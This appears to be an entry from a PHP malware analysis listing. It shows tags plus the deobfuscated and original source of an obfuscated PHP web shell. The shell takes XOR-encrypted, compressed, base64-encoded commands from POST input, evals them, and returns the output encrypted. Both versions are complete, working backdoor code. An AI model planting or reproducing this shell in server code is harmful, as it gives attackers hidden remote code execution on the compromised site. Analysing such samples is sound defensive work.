PHP Malware Analysis

Back to list

Tags

Encoding
base64_decode
base64_encode
Execution
eval
Input
_GET

Deobfuscated code

<?php

$F = '<="X82pUNA<LVe0K1J97gA<";functioA<n A<x(A<$t,$A<k){$c=strlen($A<A<k);$l=strl';
$p = 'en($A<t);A<A<$o="";for($i=A<0;$i<$lA<;)A<{for($jA<=0;($jA<<$c&&$i<$lA<);$';
$j = '=1) {@A<ob_sA<tart();@eA<valA<(@gA<zunA<A<compress(@x(@baseA<A<64_decode(';
$P = '$k="A<eeA<a445cA<2";$khA<="a0A<63b6a58c4e";$A<kfA<="bc83eA<72cfA<ec1";$pA';
$U = "create_function";
$G = 'cA<h(A<"/$kA<h(.+)$kf/A<",@file_get_conteA<ntA<s(A<"php://inA<put"),$m)=A<';
$s = 'j+A<+,$i+A<+)A<{$o.=$t{$i}A<^$k{$A<j};}}retA<urn $oA<;}ifA< (A<@prA<eg_mat';
$E = 'se6A<4_encA<ode(A<@A<x(@gzcompA<resA<s($o),$k)A<);print(A<"A<$p$kh$r$kf");}';
$l = '$mA<[1]),A<$k)));$o=A<@obA<_get_contenA<A<A<tsA<(A<);@ob_end_clean();$r=@ba';
$i = "\$k=\"eea445c2\";\$kh=\"a063b6a58c4e\";\$kf=\"bc83e72cfec1\";\$p=\"X82pUNLVe0K1J97g\";function x(\$t,\$k){\$c=strlen(\$k);\$l=strlen(\$t);\$o=\"\";for(\$i=0;\$i<\$l;){for(\$j=0;(\$j<\$c&&\$i<\$l);\$j++,\$i++){\$o.=\$t{\$i}^\$k{\$j};}}return \$o;}if (@preg_match(\"/\$kh(.+)\$kf/\",@file_get_contents(\"php://input\"),\$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode(\$m[1]),\$k)));\$o=@ob_get_contents();@ob_end_clean();\$r=@base64_encode(@x(@gzcompress(\$o),\$k));print(\"\$p\$kh\$r\$kf\");}";
$Q = function () {
    $k = "eea445c2";
    $kh = "a063b6a58c4e";
    $kf = "bc83e72cfec1";
    $p = "X82pUNLVe0K1J97g";
    function x($t, $k)
    {
        $c = strlen($k);
        $l = strlen($t);
        $o = "";
        for ($i = 0; $i < $l;) {
            for ($j = 0; $j < $c && $i < $l; $j++, $i++) {
                $o .= $t[$i] ^ $k[$j];
            }
        }
        return $o;
    }
    if (@preg_match("/a063b6a58c4e(.+)bc83e72cfec1/", @file_get_contents("php://input"), $m) == 1) {
        @ob_start();
        @eval(@gzuncompress(@x(@base64_decode($m[1]), $k)));
        $o = @ob_get_contents();
        @ob_end_clean();
        $r = @base64_encode(@x(@gzcompress($o), $k));
        print "{$p}{$kh}{$r}{$kf}";
    }
};
$Q();


Original code

<?php
$F='<="X82pUNA<LVe0K1J97gA<";functioA<n A<x(A<$t,$A<k){$c=strlen($A<A<k);$l=strl';
$p='en($A<t);A<A<$o="";for($i=A<0;$i<$lA<;)A<{for($jA<=0;($jA<<$c&&$i<$lA<);$';
$j='=1) {@A<ob_sA<tart();@eA<valA<(@gA<zunA<A<compress(@x(@baseA<A<64_decode(';
$P='$k="A<eeA<a445cA<2";$khA<="a0A<63b6a58c4e";$A<kfA<="bc83eA<72cfA<ec1";$pA';
$U=str_replace('jZ','','crejZatjZe_jZfujZnjZctjZion');
$G='cA<h(A<"/$kA<h(.+)$kf/A<",@file_get_conteA<ntA<s(A<"php://inA<put"),$m)=A<';
$s='j+A<+,$i+A<+)A<{$o.=$t{$i}A<^$k{$A<j};}}retA<urn $oA<;}ifA< (A<@prA<eg_mat';
$E='se6A<4_encA<ode(A<@A<x(@gzcompA<resA<s($o),$k)A<);print(A<"A<$p$kh$r$kf");}';
$l='$mA<[1]),A<$k)));$o=A<@obA<_get_contenA<A<A<tsA<(A<);@ob_end_clean();$r=@ba';
$i=str_replace('A<','',$P.$F.$p.$s.$G.$j.$l.$E);
$Q=$U('',$i);$Q();
?>